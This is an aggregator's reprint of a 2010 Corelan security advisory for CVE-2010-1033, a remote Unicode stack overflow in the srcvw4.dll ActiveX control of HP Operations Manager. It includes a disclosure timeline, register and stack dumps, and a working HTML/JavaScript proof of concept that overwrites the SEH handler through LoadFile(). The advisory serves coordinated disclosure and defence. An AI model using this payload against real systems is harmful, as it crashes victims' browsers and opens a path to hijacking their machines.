HP Operations Manager 7.5 / 8.10 / 8.16 Remote Stack Overflow

🗓️ 20 Apr 2010 00:00:00Reported by mr_meType

packetstorm🔗 packetstormsecurity.com👁 38 Views

HP Operations Manager 7.5 / 8.10 / 8.16 Remote Stack Overflow vulnerability discovered by mr_me with exploit details and vendor communicatio

Reporter	Title	Published	Views	Family All 13
0day.today	HP Operations Manager <= v8.16 - (srcvw4.dll) Unicode Stack Overflow	20 Apr 201000:00	–	zdt
Circl	CVE-2010-1033	20 Apr 201000:00	–	circl
CVE	CVE-2010-1033	21 Apr 201014:00	–	cve
Cvelist	CVE-2010-1033	21 Apr 201014:00	–	cvelist
Exploit DB	HP Operations Manager 8.16 - 'srcvw4.dll' 'LoadFile()'/'SaveFile()' Remote Unicode Stack Overflow (PoC)	20 Apr 201000:00	–	exploitdb
exploitpack	HP Operations Manager 8.16 - srcvw4.dll LoadFile()SaveFile() Remote Unicode Stack Overflow (PoC)	20 Apr 201000:00	–	exploitpack
Tenable Nessus	HP Operations Manager SourceView ActiveX LoadFile / SaveFile Stack Overflows	21 Apr 201000:00	–	nessus
NVD	CVE-2010-1033	21 Apr 201014:30	–	nvd
Prion	Stack overflow	21 Apr 201014:30	–	prion
Positive Technologies	PT-2010-2754 · Tetradyne +1 · Tetradyne Activex +1	21 Apr 201000:00	–	ptsecurity

`|------------------------------------------------------------------|  
| __ __ |  
| _________ ________ / /___ _____ / /____ ____ _____ ___ |  
| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |  
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |  
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |  
| |  
| http://www.corelan.be:8800 |  
| [email protected] |  
| |  
|-------------------------------------------------[ EIP Hunters ]--|  
| |  
| Vulnerability Disclosure Report |  
| |  
|------------------------------------------------------------------|   
  
Advisory : CORELAN-10-027  
Disclosure date : 20/4/2010  
References :  
HP : http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02078800  
Corelan : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-027  
CVE : CVE-2010-1033  
  
  
0x00 : Vulnerability information  
  
- Product : HP Operations Manager  
- Version : v7.5, v8.10 and v8.16  
- Vendor : http://www.hp.com/  
- URL : http://www.hp.com/  
- Platform : Windows  
- Type of vulnerability : Remote Stack overflow  
- Risk rating : Medium  
- Issue fixed in version : Version:1 (rev.1) - 19 April 2010 Initial release  
- Vulnerability discovered by : mr_me  
- Corelan Team : http://www.corelan.be:8800/index.php/security/corelan-team-members/  
  
Affected versions :  
HP Operations Manager for Windows v8.10, v8.16 with srcvw4.dll v4.0.1.1 and earlier   
HP Operations Manager for Windows v7.5 with srcvw32.dll v2.23.28 and earlier  
  
  
0x01 : Vendor description of software  
  
HP Operations Manager is a consolidated event and performance management console that correlates infrastructure, network and end-user experience events across your entire IT infrastructure. It monitors both physical and virtual servers to identify the root cause of event storms, allowing faster time to resolution at lower cost.  
This software helps your IT staff improve its efficiencies by automating performance and availability monitoring. It provides a consolidated view into infrastructure health that helps you prevent service outages. And it allows your organization to handle more tasks on your own, freeing subject matter experts to focus on more strategic tasks.  
HP Operations Manager can also incorporate agent-less monitoring using HP SiteScope software. In addition, when used in conjunction with Operations Orchestration, it automates routine tasks, reducing the labor required to manage your IT operations.  
  
  
0x02 : Vulnerability details  
  
By loading the activeX control (GUID: 366C9C52-C402-416B-862D-1464F629CA59) LoadFile() in the module srcvw4.dll an  
attacker can pass an overly long string value and overwrite the exception handler, thus, hijacking the flow of execution.   
  
  
0x03 : Vendor communication  
  
- 30th Mar, 2010 - Initial vendor contact  
- 31st Mar, 2010 - Vendor acknowledged the issue and requested PoC  
- 31st Mar, 2010 - Sent PoC code  
- 1st Apr, 2010 - Vendor confirmed the vulnerability  
- 13th Apr, 2010 - Vendor notified us that they will release security bulletin and patch  
- 20th Apr, 2010 - Vendor releases security bulletin  
- 20th Apr, 2010 - Public Disclosure  
  
  
0x04 : Exploit  
  
<html>  
<!--  
|------------------------------------------------------------------|  
| __ __ |  
| _________ ________ / /___ _____ / /____ ____ _____ ___ |  
| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |  
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |  
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |  
| |  
| http://www.corelan.be:8800 |  
| [email protected] |  
| |  
|-------------------------------------------------[ EIP Hunters ]--|  
  
# HP Operations Manager <= v8.16 - (srcvw4.dll) LoadFile()/SaveFile() Remote Unicode Stack Overflow PoC  
# Found by: mr_me - http://net-ninja.net/  
# Homepage: http://www.hp.com/  
# CVE: CVE-2010-1033  
# Tested on: Windows XP SP3 (IE 6 & 7)  
# Marked safe for scripting: No  
# Module path: C:\Program Files\HP\HP BTO Software\bin\srcvw4.dll  
# HP's Advisory: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02078800  
# Advisory: http://www.corelan.be:8800/advisories.php?id=10-027  
# Greetz: Corelan Security Team  
# http://www.corelan.be:8800/index.php/security/corelan-team-members/  
# ######################################################################################################  
# Notes:   
# - This is a 3rd party library by Tetradyne Inc (not from HP) but HP take full responsibility  
# - /SafeSEH protected module  
# - The SaveFile() function is also vulnerable to a unicode stack overflow.   
# - Having '\x42' or 'B' as the 2nd byte of nseh will cause us to overwrite the address  
# of seh handler itself and not the contents.  
# - There is simply no code execution on this because there is no unicode friendly  
# ppr's that I know of. However you could include other components, to get code execution.  
# ######################################################################################################  
# Script provided 'as is', without any warranty.  
# Use for educational purposes only.  
# Do not use this code to do anything illegal !  
#  
# Note : you are not allowed to edit/modify this code.   
# If you do, Corelan cannot be held responsible for any damages this may cause.  
  
The Registers:  
  
EAX 002BD012  
ECX 000AEAAA  
EDX 02A90024 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..  
EBX 80070003  
ESP 0013DA1C  
EBP 0013DA70 UNICODE "Could not open file AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..  
ESI 02A9258C UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..  
EDI 00140000 ASCII "Actx "  
EIP 024DA413 srcvw4.024DA413  
  
The stack:  
  
0013B600 00410041 A.A. iexplore.00410041  
0013B604 00410041 A.A. iexplore.00410041  
0013B608 00430043 C.C. Pointer to next SEH record  
0013B60C 00420042 B.B. SE handler  
0013B610 00440044 D.D.  
0013B614 00440044 D.D.  
  
And remember, its better to try and fail, then fail to try :-)  
-->  
<object classid='clsid:366C9C52-C402-416B-862D-1464F629CA59' id='boom' ></object>  
<script language="JavaScript" defer>   
function b00m()   
{   
var buffSize = 1072;  
var x = unescape("%41");  
var y = unescape("%44");  
// 'B' or \x41 as the 2nd byte of nseh will destroy our SEH chain  
var nseh = unescape("%43%43");  
var seh = unescape("%42%42");  
while (x.length<buffSize) x += x;   
x = x.substring(0,buffSize);   
while (y.length<buffSize) y += y;   
y = y.substring(0,buffSize);   
boom.LoadFile(x+nseh+seh+y);  
}   
</script>   
<body onload="JavaScript: return b00m();">   
<p><center>~ mr_me presents ~</p>  
<p><b>HP Operations Manager <= v8.16 - (srcvw4.dll) LoadFile()/SaveFile() Remote Unicode Stack Overflow PoC</b></center></p>   
</body>  
</html>  
`

20 Apr 2010 00:00Current

1.1Low risk

Vulners AI Score1.1

EPSS0.22586